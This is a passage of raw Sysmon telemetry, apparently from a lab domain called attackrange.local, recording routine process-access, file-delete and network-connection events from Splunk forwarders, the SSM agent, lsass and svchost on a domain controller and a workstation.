ws\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061005Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:51.011{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3D-6063-2100-00000000AF01}1636C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061004Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:50.995{7F8C56E7-4E3C-6063-1400-00000000AF01}10401428C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245739Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:51.835{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4377ACC489463076711C4DE7584298E4,SHA256=84BDC08D16A9167C1C5FFF990AE34680823FB72A8847F3C508AD5E8292D5305F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245738Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.419{CB4067E1-304D-6062-3500-00000000AF01}2972C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64772-false169.254.169.254instance-data.us-west-2.compute.internal80http 354300x8000000000000000245737Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.325{CB4067E1-304D-6062-3500-00000000AF01}2972C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64771-false169.254.169.254instance-data.us-west-2.compute.internal80http 354300x8000000000000000245736Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.280{CB4067E1-304D-6062-3500-00000000AF01}2972C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64770-false169.254.169.254instance-data.us-west-2.compute.internal80http 354300x8000000000000000245735Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.280{CB4067E1-304D-6062-3500-00000000AF01}2972C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64769-false169.254.169.254instance-data.us-west-2.compute.internal80http 23542300x80000000000000001061009Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:52.871{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E54972C8D0A0EB657185D5892C403431,SHA256=8901A10C546739BC20AEF52606209E2D6D92F254A883767DB5495C4C8064D9D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245742Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:52.928{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E970D4B6F91906BF8E5AA677582D695,SHA256=9D0E40C783339471B4617AA2AEFEB4DB42DEA70D7FCBB5A3EBEF5325C6FC0EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245741Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:52.663{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B2FC0701362F58D3544DE17453F420CC,SHA256=912E640495CB597A2350662E891D0E24FF028C4C4EFC2DBAB43F32EC8A15D759,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245740Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:50.671{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64773-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001061010Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:49.889{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54783-false10.0.1.12-8089- 23542300x8000000000000000245744Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:53.991{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245743Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:53.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=308A0C80A0999E84ADB740CEAC5337EC,SHA256=44F9795A28154BB9746D9FD9E325FD219A47B9272978707B6BCEED098B0947A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061012Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:54.933{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E77E299E07995F069A3CE13948F74D99,SHA256=22A8FB8009703964F83D2983FC9D93D3BBFD178789CF45AF23A2B87FB8AF8E79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061011Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:54.246{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23AB574277F54B6AFFD0509C9EDC2A29,SHA256=0C01744C8E90FE13A7C9E54CA87C37DF31E3FBF6947932FBCC40465E5054F833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245745Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:54.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B456DBA77AAAE69C9C374222ADE105D1,SHA256=778888F2AFCE880E195BAE9AE00B5E94F48387D838FA5C4F93A66DA1EC009BD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061014Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:55.621{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB07CC18E2685D4CBC8012FABB5C36C0,SHA256=835BA22008EE8983E1CE2CF85CFF6F21DAF3C4136A9A6C846184F6AE98571384,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061013Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:51.905{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54784-false10.0.1.12-8000- 23542300x8000000000000000245748Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:55.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0CE64F298403A04885E49272FF5E3C,SHA256=8753F434CF4B98B7E627F0E57E38495018ADF3713D8C8C2BFB9917DDB38E1DA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245747Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:54.407{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64774-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000245746Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:55.194{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36950450F0243FFBCFC18D129E4DA82F,SHA256=3F056D5C65EA6A816BBDA67ECE66B08A9B52334A0A2BA1E498E2F68FF757FEA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061015Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:56.980{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE3F6955AA8D3CB427F12E8CDF711DE,SHA256=84987C98F00E8BB5B7364B968DCAAE6E3FD06B14D069B5A42802A46801865CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245749Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:56.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442680D53887EFB63A31AEEBCF47604B,SHA256=582E216726CECAF9AEC064ABF1AE85FAB53BBFFAD8E1D2D06493ADE0F7EF599B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245752Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:57.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB37B70D871653D20FF2E9B791E2282C,SHA256=6E99581468C6C951381F9DFF38072B32CB2AF711A3F36238F893E3CA1C450F19,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245751Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:56.485{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64775-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245750Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:57.085{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=990A52C0FA0A3E42D17327E7EC48CB7B,SHA256=20DF033B7E4EB8E22E2603B5EAD3B3639282AD5C65C32F3C56FFF1733C9E5BC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061016Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.340{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D7B8611942BC14DE5FD8A6830C76992,SHA256=2DDDB9A28109CF9E44CBF6FF50E5F646A986710FBA858EC25127F2F28A4A5883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245753Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:58.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A387A1941378265E504F6CE54B62A36,SHA256=45D942E2B4DB0869F2F5520392115E74E2FB033361A7428CE16FB3267475D244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061017Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:59.700{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18444C05514F9EA6AF1DF8056DC6447C,SHA256=6B0465C215D49785FB3FEEFEE457B64EDCD3624CF9EA0873B68587F76456E059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245754Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:59.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4AF3979AE7B43F6D7828C96F0FBABD,SHA256=F4B2F4F7D987106DD3A313EAA0D62B8FDEF23167AF16B8C582B9CE3D86BA1C17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061020Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:00.387{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=DA2BE59C4EF980478FB13951FF6E7805,SHA256=C6DA4D6D58E777092DA19FCADFD80DDED20DE102EB6DDC9DFE96CEABBAA3BED0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061019Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:00.387{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=59F796ECB53AD6008612204BE1D8BA2E,SHA256=8D689580626330B8F12F2019D1B377CA1478B5A21243C6EEBB1B31402FC8E1C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061018Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:57.030{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54785-false10.0.1.12-8000- 23542300x8000000000000000245755Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:00.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921F4C5EB09DB0A40833BDA820CD50CE,SHA256=FF16D6068C92C531DF6EAAF21E7FBAC12BB916CFE53513DD671879AC573FEE6F,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001061029Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.609{7F8C56E7-4E3B-6063-0B00-00000000AF01}628win-dc-877.attackrange.local010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001061028Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.609{7F8C56E7-4E3B-6063-0B00-00000000AF01}628win-dc-877.attackrange.local0fe80::1d65:2de2:d417:1a1f;C:\Windows\System32\lsass.exe 23542300x80000000000000001061027Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:01.747{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=E15977E4A1441BAB97751F64CF0AD6BE,SHA256=373BB71574479B4367EC84C50C6A5A72EBADD3DF390ED2880B3DC19FA3F586C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061026Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.601{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54787-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local49666- 354300x80000000000000001061025Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.601{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54787-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local49666- 354300x80000000000000001061024Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.601{7F8C56E7-4E3C-6063-0D00-00000000AF01}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54786-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 354300x80000000000000001061023Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:58.601{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54786-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 23542300x80000000000000001061022Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:01.059{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3BF2F5F0C2BE0249D66834349CAEF57,SHA256=99E79ECAED55A29EEEE1FC3A5F4ED9A9D91FEDD2BF21F403D52E5A50A9019D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061021Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:01.059{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=241C7E9688BC1D49A831DDA5658CC23D,SHA256=8F3A0624F5BE297156C22D42A87815F6DC632CD28A52A5DB6B6F7B0CD22D8B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245756Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:01.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FB7C8C4097F1DED17F476B3F338A6A,SHA256=D98100B2714053744704E4ECC9CE8CE3EB3B4F331AB78549C296675883FB4C6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061030Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:02.419{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80DA10F7CCA587BF1CCF664C8755E977,SHA256=38EC9BB5395B0DDA9099AF4F8C76E2A079EA2D55A1414F8CD78A7EFEA6CBFC7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245757Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:02.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEBE7C10A528483BEDB950E12E8DB7C1,SHA256=7E481A6EAB63EB22C49FFAB6F0784185A747C1C0256785B025E3242BADB671DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061032Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.794{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DBF9840EDC4DF2C6AA46554FE5AEF81,SHA256=59D83737EE0F48C98324C6F4AE2C5D39E06F3629AAD3FF0A6DCE92437B99288C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061031Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.794{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1136118EC94644E1F54405ED797D8239,SHA256=FBA94179B8C81B37B4B558605D79B8732B7461AEAC2DE6B866CE39D05E61CB3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245761Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:03.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB3007359B8B45D00A0773FA00EE2766,SHA256=F0A94260900D0501A14C45D2782FE3312FC3C44E8E170A6151E6E31CBA3003A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245760Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:02.500{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64776-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245759Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:03.069{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D400E9EDAF0B6E6C42824E3EAB797A07,SHA256=A5F6736B93E40DD221E5CD69CBDB3321DC74C5BF9FAE635747F00DA62B5BD139,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245758Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:03.069{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B4FC5CF68A22C252620D2639ADD55ABC,SHA256=678E4D3145D219AAD5775ABC94EBCB66205BE54EF5849B59EF7BF667D69E38ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245762Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:04.960{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 